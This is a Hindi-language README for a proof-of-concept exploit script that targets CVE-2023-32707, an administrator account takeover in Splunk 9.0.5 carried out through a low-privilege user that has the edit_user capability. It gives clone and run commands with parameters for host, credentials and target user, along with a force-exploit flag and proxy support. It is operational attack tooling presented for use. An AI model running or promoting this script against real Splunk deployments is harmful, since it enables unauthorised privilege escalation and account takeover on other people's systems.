
एक बेहतर POC एक्सप्लॉइट जो exploitdb पर रिपोर्ट किए गए CVE पर आधारित है।
एक बेहतर POC शोषण जो exploitdb पर रिपोर्ट किए गए CVE पर आधारित है
शोषण शीर्षक: Splunk 9.0.5 - एडमिन खाता अधिग्रहण CVE: CVE-2023-32707
यह स्क्रिप्ट Splunk 9.0.5 में एक कमजोरी का शोषण करने की अनुमति देती है, जिससे एडमिन खाता अधिग्रहण होता है। शोषण edit_user क्षमता वाले कम-विशेषाधिकार वाले उपयोगकर्ता का उपयोग करके विशेषाधिकार बढ़ाता है।
pip3 install -r requirements.txt का उपयोग करके इंस्टॉल करें):
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/9xN/CVE-2023-32707.git
cd CVE-2023-32707
आवश्यक पैरामीटर के साथ स्क्रिप्ट चलाएँ:
python3 exploit.py --host <splunk_host> --username <splunk_username> --password <splunk_password> --target-user <target_user> --force-exploit
<splunk_host>, <splunk_username>, <splunk_password>, और <target_user> को अपने Splunk सर्वर विवरण से बदलें।
--host: Splunk होस्ट या IP पता (आवश्यक)--username: Splunk उपयोगकर्ता नाम (आवश्यक)--password: Splunk पासवर्ड (आवश्यक)--target-user: खाता अधिग्रहण के लिए लक्ष्य उपयोगकर्ता (आवश्यक)--force-exploit: शोषण को बलपूर्वक लागू करें (वैकल्पिक)--proxy-file: प्रॉक्सी सेटिंग्स वाली फ़ाइल (वैकल्पिक)प्रॉक्सी का उपयोग करने के लिए, --proxy-file को प्रॉक्सी सेटिंग्स वाली फ़ाइल के पथ के साथ निर्दिष्ट करें।
उदाहरण:
python3 exploit.py --host <splunk_host> --username <splunk_username> --password <splunk_password> --target-user <target_user> --force-exploit --proxy-file proxies.txt